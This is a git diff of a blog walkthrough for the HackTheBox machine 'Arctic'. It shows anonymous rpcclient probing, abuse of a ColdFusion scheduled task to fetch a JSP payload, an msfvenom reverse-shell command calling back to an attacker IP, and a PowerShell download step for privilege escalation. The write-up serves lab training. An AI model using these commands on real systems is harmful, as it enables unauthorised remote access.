Updated arctic post and added rpcclient cheatsheet

--- a/_posts/HackTheBox/2020-04-07-arctic.md
+++ b/_posts/HackTheBox/2020-04-07-arctic.md
@@ -8,6 +8,7 @@ image: htb/arctic/arctic.png
 
 # Introduction
 
+Arctic is a Windows machine on Hackthebox.
 
 
 # Reconnaissance & Enumeration
@@ -34,7 +35,14 @@ OS and Service detection performed. Please report any incorrect results at https
 Nmap done: 1 IP address (1 host up) scanned in 141.73 seconds
 ```
 
-The scan shows two MSRPC services and one unknown that nmap couldn’t pick up on so navigating to that port on the browser shows the webpage.
+The scan shows two MSRPC services and one unknown that nmap couldn’t pick up. Before checking out what it is exactly, I used rpcclient and tried to connect to the two MSRPC services with anonymous credentials:
+
+```bash
+rpcclient -U "" -N -p 135 10.10.10.11
+rpcclient -U "" -N -p 49154 10.10.10.11
+```
+
+Server timed out, no luck. Back to see whats running on port 8500 so navigating to that port on the browser shows the webpage.
 
 | ![image]({{site.github.url}}/assets/img/htb/arctic/index.png) |
 | :--: |
@@ -67,13 +75,13 @@ The portal shows a hashed password that I could attempt to crack. You can use Jo
 | :--: |
 | *Important directory mappings. If get to upload files to the server we'll use these default file paths* |
 
-On the admin portal there is an option for “Scheduled Tasks” which gives us the ability to execute a task from a remote URL! Reverse shell task coming up. We know the server handles CFML and JSP from our reconnaissance so we can decide on a web shell (CFML) or a complete shell to the machine (JSP), I went for a complete shell but the CFML webshells are under “/usr/share/webshells/cfm” on Kali. Saved the task to a file called shell.jsp using the default file path mappings above so we can execute that file from ```http://10.10.10.11/CFIDE/<file>```
+On the admin portal there is an option for “Scheduled Tasks” which gives us the ability to execute a task from a remote URL! Reverse shell task coming up. We know the server handles CFML and JSP from our reconnaissance so we can decide on a web shell (CFML) or a complete shell to the machine (JSP), I went for a complete shell but the CFML webshells are under **/usr/share/webshells/cfm** on Kali. Save the task to a file called shell.jsp using the default file path mappings above so we can execute that file from ```http://10.10.10.11/CFIDE/<file>```
 
 | ![image]({{site.github.url}}/assets/img/htb/arctic/task.png) |
 | :--: |
 | *Creating a task to download a file from my python webserver* |
 
-Create a new directory to host the reverse shell file using a webserver, create a jsp reverse shell using msfvenom and setup your netcat listener:
+Create a new directory to host the reverse shell file using a webserver, create a jsp reverse shell using msfvenom and setup your netcat listener. Go the **http://10.10.10.11:8500/CFIDE/shell.jsp** and then wait for your listener to catch that connection.
 
 ```bash
 root@kali:~/Documents/boxes/arctic/share# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.19 LPORT=443 -f raw > shell.jsp
@@ -122,6 +130,6 @@ C:\Users\tolis\Desktop>powershell.exe -c "(New-Object System.Net.WebClient).Down
 | :--: |
 | *Running the exploit* |
 
-| ![image]({{site.github.url}}/assets/img/htb/arctic/exploit.png) |
+| ![image]({{site.github.url}}/assets/img/htb/arctic/root.png) |
 | :--: |
-| *Running the exploit* |
+| *Boom, root privelleges.* |
